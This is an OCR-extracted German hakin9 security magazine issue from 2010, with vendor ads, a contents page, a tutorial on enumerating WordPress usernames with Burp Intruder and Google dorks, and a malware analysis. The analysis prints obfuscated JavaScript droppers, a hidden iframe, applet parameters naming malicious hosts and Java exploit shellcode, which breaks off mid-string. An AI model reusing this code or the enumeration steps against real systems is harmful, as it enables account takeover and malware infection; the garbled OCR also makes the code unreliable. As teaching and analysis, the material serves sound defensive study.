Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
4
INHALTSVERZEICHNIS
FORTGESCHRITTENE11 Malware-Doppelschlag per JavaScript und JavaAppletMichael PeickBesonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr we-nig Einflussnahme des Anwenders Schadsoftware ins-tallieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
PRAXIS17 Penetration Testing im Jahre 2010Dimitri RoschkowskiViele Administratoren uumlbersehen leider bei der Absi-cherung des Netzwerkes seine physikalische Sicher-heit Die Bedrohung kommt nicht nur durch das Ether-net-Kabel
ABWEHR25 OCTAVE ndash Hier macht das Risiko die Musik Helmut KaufmannDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanage-ment und Business Continuity Planning zu implemen-tieren
FUumlR EINSTEIGER06 User Enumeration bei Web-ApplikationenKai RenzWo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlng-lich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen ein-gesetzt
102010
4 62010
herausgegeben vom VerlagSoftware Press Sp z o o SK
Geschaumlftsfuumlhrer
Managing Director
ewalozowickasoftwarecompl
Chefredakteurin
ilonaprzybyslawskasoftwarecompl
RedaktionBetatester Kai Renz Michael Peick Dimitri Roschkowski Helmut Kauf-mann Andreas Lentwojt Patrick Schmid Tobias Glemser Ulrike Peter Nicole Huck Michael Schratt
Produktion Andrzej KucaDTP
Umschlagsentwurf
Werbung advsoftwarecompl
Anschrift
Software Press Sp z oo SKul Bokserska 1 02-682 Warszawa PolandTel +48 22 427 36 56 Fax +48 22 244 24 59wwwhakin9orgde
Die Redaktion bemuumlht sich dafuumlr Sorge zu tragen dass die in der Zeitschrift sowie auf den begleitenden Datentraumlgern erhaltenen Informationen und Anwendungen zutreffend und funktionsfaumlhig sind uumlbernimmt jedoch keinerlei Gewaumlhr fuumlr derer Geeignetheit fuumlr bestimmte Verwendungszwecke Alle Mar-kenzeichen Logos und Handelsmarken die sich in der Zeitschrift befinden sind regist-rierte oder nicht-registrierte Markenzeichen der jeweiligen Eigenuumlmer und dienen nur als inhaltliche Ergaumlnzungen
Anmerkung
Die in der Zeitschrift demonstrierten Techniken sind AUSSCHLIEszligLICH in eigenen Rechner-netzen zu testen Die Redaktion uumlbernimmt keine Haftung fuumlr eventuelle Schaumlden oder Konsequenzen die aus der unangemessenen Anwendung der beschriebenen Techniken entstehen Die Anwendung der dargestellten Techniken kann auch zum Datenverlust fuumlhrenhakin9 erscheint in folgenden Sprachversionen und Laumlndern deutsche Version (Deutschland Schweiz Oumlsterreich Luxemburg) franzoumlsische Version (Frankreich Kanada Belgien Marok-ko) spanische Version (Spanien Portugal) polnische Version (Polen) englische Version (Kanada USA)
hakin9orgde 5
44 Interview mit Ulrike PeterbdquoDie IT ist (und bleibt es sicher auch) eine Maumlnnerdo-maumlne ndash Frauen in der IT-Branche sind ParadiesvoumlgelldquoMehr erfahren Sie aus dem Interview mit Ulrike Peter ndash freie Journalistin und seit zehn Jahren fuumlr unterschiedli-che Unternehmen und Medien in der IT-Branche taumltige PR-Spezialistin
REZENSIONEN46 SAP for DFPS Implementierung und Custo-mizingNicole HuckDas Buch SAP for DFPS Implementierung und Cus-tomizing basiert auf mehr als 20 Jahren Erfahrung die die Autoren insgesamt bei der Entwicklung Imple-mentierung aber auch Schulung der Loumlsung sammeln konnten
5
30 IT-Risikomanagement ndash Wozu brauche ich dasAndreas LentwojtIn der letzen Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Ein-blick in die 27000-Familie gegeben Ein Teil dieser Fa-milie ist die ISO 27005 die sich mit dem IT-Risikoma-nagement befasst
ANGRIFF37 DNS Cache PoisoningPatrick SchmidAls Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschie-ben koumlnnen
INTERVIEW 41 Interview mit Tobias GlemserbdquoSicherheit darf nicht erst am Ende von neuen Anwen-dungen Produkten oder Projekten als Kontrollinstru-ment einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoMehr erfahren Sie aus dem Interview mit Tobias Glem-ser ndash leitender IT-Sicherheitsberater bei der Tele-Con-sulting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbe-reich Penetrationstests
InhaltsverzeIchnIs
Im Zusammenhang mit den Aumlnderungen die in letzter Zeit in dem
deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen moumlchten wir ankuumlndigen dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt
Unser Magazin dient ausschlieszliglich den Erkenntniszwecken
Alle im Magazin praumlsentierten Methoden sollen fuumlr eine sichere IT
fungieren Wir legen einen groszligen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kaumlmpfung von IT Kriminalitaumlt
920106
FUumlR EINSTEIGER
Das Problem mit solchen Authentifizierung ist dass sie nur maximal so sicher sind wie ihr schwaumlchstes Glied Durch das Web 20 wird im-
mer mehr auf Komfort und Benutzerfreundlichkeit ge-setzt wodurch einfache Sicherheitsmechanismen ihre Wirkung verfehlen Bruteforce Angriffe galten durch die schier unendlichen Kombinationsmoumlglichkeiten als bdquonicht mehr praktikabelldquo Viele Seiten erlauben es uns aber die Anzahl an Versuchen drastisch einzuschraumln-ken da sie Informationen preisgeben die einen Angriff oftmals bedeutend einfacher machen
Wenn Sie sich heute im Internet herumtreiben finden Sie sich zwischen Social Networks Auktionsplattfor-men und Tauschboumlrsen wieder Identitaumlten werden im Netz frei und fuumlr jedermann zugaumlnglich eingestellt und manch einem kommt es vor wie wenn er durch Twit-ter und Co mehr uumlber seinen Nachbarn wuumlsste wie uumlber seinen langjaumlhrigen Freund Obwohl viele immer noch der Ansicht sind sich frei und anonym im Internet bewegen zu koumlnnen so stellen sie doch Details uumlber ihr Leben jedem frei zur Verfuumlgung Sie denken ein frei erfundener Benutzername halte die meisten davon ab ihre wahre Identitaumlt herauszufinden Lassen Sie sich gesagt sein das dies ein Irrtum ist ndash ein sehr groszliger Irr-tum Die Gefahr die all dies mit sich bringt ist leicht zur erklaumlren Stellen Sie sich vor sie arbeiten in einem gro-szligen Telekommunikationsunternehmen Uumlber Facebook und Xing halten Sie gerne Kontakt mit Kollegen aus
dem Ausland ndash dafuumlr sind diese Plattformen ja schlieszlig-lich auch bestens geeignet Doch was wenn jemand ihr Konto uumlbernimmt und unter Ihrem Namen dort Humbug treibt Stellen Sie dies nicht sofort fest so kann diese Internetplattform schnell zu einem sehr groszligen Problem werden Schon bei der Anmeldung bei diesen Seiten le-gen wir unsere wichtigen Daten in die Haumlnde der Betrei-ber ohne das uns eigentlich wirklich interessiert wofuumlr diese weiter verwendet werden Erst wenn mal wirklich ein groszliger Skandal an die Oberflaumlche dringt herrscht Empoumlrung und die allgemeine bdquoich hablsquos doch gesagtldquo-Stimmung kommt auf Bei Spammern und Crackern sind Accounts zu Auktionsplattformen Email-Konten und Social Networks sehr beliebt da viele Benutzer fuumlr mehrere Zugaumlnge das selbe Passwort verwenden und so zum Beispiel durch den eBay-Account auf Rechnung des Opfers eingekauft werden kann Ein Benutzer kann hier nur wenige trotzdem aber effektive Maszlignahmen ergreifen Ein sicheres Passwort zu waumlhlen ist der erste und wichtigste Schritt wobei immer mehr Passwoumlrter uumlber nicht-verschluumlsselte Verbindungen und Keylogger abgefangen werden und somit auch das sicherste Pass-wort nutzlos ist Ein zweiter Schritt waumlre verschiedene Passwoumlrter fuumlr die unterschiedlichen Seiten zu verwen-den und diese regelmaumlszligig zu erneuern Dieser Schritt wird aber leider nur sehr selten wirklich umgesetzt da er mit grossem Aufwand verbunden ist und die meisten Benutzer keine Lust haben sich mehrere verschiedene
User Enumeration bei Web-Applikationen
Wo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlnglich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen eingesetz
IN DIESEM ARTIKEL ERFAHREN SIE
-ren
-den
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Kai Renz
User Enumeration bei Web-Applikationen
hakin9orgde 7
anders vorgehen er uumlberpruumlft den Login-Mechanismus auf Ausgaben welche den Benutzernamen verraten oder Hinweise darauf geben koumlnnten ob der zum Test angegebene Name ein wahrer Benutzername ist Hin-weise darauf geben Ruumlckgaben wie bdquoDas fuumlr diesen Be-nutzernamen angegebene Passwort ist nicht korrektldquo oder aumlhnliches Gegengepruumlft werden kann dies durch die Eingabe eines fiktiven Benutzers Variiert die Aus-gabe von der obigen so ist es sehr wahrscheinlich dass der zuvor verwendete Name korrekt war
Ein weiterer Angriffsvektor ist die bdquoPasswort-verges-sen-Funktionldquo Ist solch eine Funktion schlecht ge-schrieben oder ist diese einfach nur zu leichtsinnig dem Benutzer Komfortfunktionen anzubieten koumlnnen fuumlr den Angreifer wichtige Informationen preisgeben werden Eine Fehlkonfiguration bzw leichtsinnige Web 20 Funktion wie die eben angesprochene kann zum Beispiel bei Eingabe der Mailadresse auf der Passwort-Vergessen-Seite mit einem Satz wie bdquoEine Email mit Ihrem neuen Passwort fuumlr den Benutzeraccount ltna-megt wurde erfolgreich an Sie zugestelltldquo antworten wodurch der wahre Benutzer zwar eine Email der An-greifer jedoch auch den Benutzernamen erhaumllt Ist die angegebene Sicherheitsadresse inaktiv oder wird nur sporadisch verwendet so geht diese Email leicht un-ter und der Angreifer kann mit seiner Arbeit fortfahren Ein gutes Beispiel hierfuumlr ist Wordpress Auch in seiner neuesten Version kann uumlber die bdquoPasswort-vergessen-Funktionldquo der Benutzername herausgefunden werden Ein sogenannter Bot-Schutz ist nicht vorhanden so-dass wir das ganze mit einem Webproxy in unserem Fall Burpsuite automatisieren koumlnnen
Durch eine lokale Recherche an einem Wordpress haben wir herausgefunden dass beim Eingeben eines falschen Benutzernamens ein Fehler zuruumlckgegeben wird ERROR Invalid username or e-mail Verwenden wir jedoch den richtigen Benutzernamen erhalten wir ein Check your e-mail for the confirmation link
Passwoumlrter zu merken Oftmals werden zwar viele ver-schiedene Zugangsdaten verwendet durch das haumlufige wechseln werden dann aber eher einfache Passwoumlrter verwendet damit der Benutzer sich diese leicht merken kann
Um einen Zugang zum Benutzerkonto des Anwen-ders zu bekommen sind meist ein Benutzername und ein Passwort noumltig Oftmals fangen hier schon die Pro-bleme an Hat der Angreifer herausgefunden dass sich die Benutzer durch eine Email-Passwort-Kombination anmelden koumlnnen muss er schon mal viel weniger Zeit investieren den Benutzernamen herauszufinden was bei einem Bruteforce-Angriff ein Zeitvorteil sein wel-cher zwischen durchfuumlhrbar und nicht durchfuumlhrbar al-so Erfolg und Misserfolg entscheidet Oftmals reicht al-so schon eine simple Registrierung bei einer Zielseite um die Feinheiten einer Anmeldefunktion herauszufin-den und auszunutzen Kann ein Benutzer seinen Nick-namen frei waumlhlen so sind die Moumlglichkeiten bei einem Bruteforce-Angriff wieder immens sodass der Angrei-fer eine andere Taktik waumlhlen muss Er wird versuchen ohne muumlhsames Durchprobieren von Kombinationen an den Benutzernamen zu kommen oder einen ande-ren Schwachpunkt im System ausnutzen In diesem Artikel werde ich ein paar einfache Moumlglichkeiten dar-stellen um einer Web-Applikation Benutzernamen zu entlocken (User Enumeration) und diese automatisch aufzunehmen
Wie bereits oben beschrieben kann sich der Angrei-fer sofern er dazu berechtigt ist zuerst ein Bild vom Re-gistrierungs- bzw Login-Mechanismus machen Findet er beispielsweiszlige heraus dass der Benutzername eine Mailadresse ist so kann er leicht Suchmaschinen oder Social Networks verwenden um diese herauszufinden Werden frei waumlhlbare Benutzernamen verwendet so faumlllt diese Art von Recherche weitestgehend aus wo-bei natuumlrlich auch hier manchmal ein Gluumlckstreffer da-bei sein kann In so einem Fall wird der Angreifer aber
Abbildung 1 Funktionsweiszlige einfache User Enumeration
Benutzername 1a2a3d4fPasswort sosecret
Benutzername foobarPasswort sosecret
Bruteforce
Benutzername foobarPasswort topsecret
Request Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
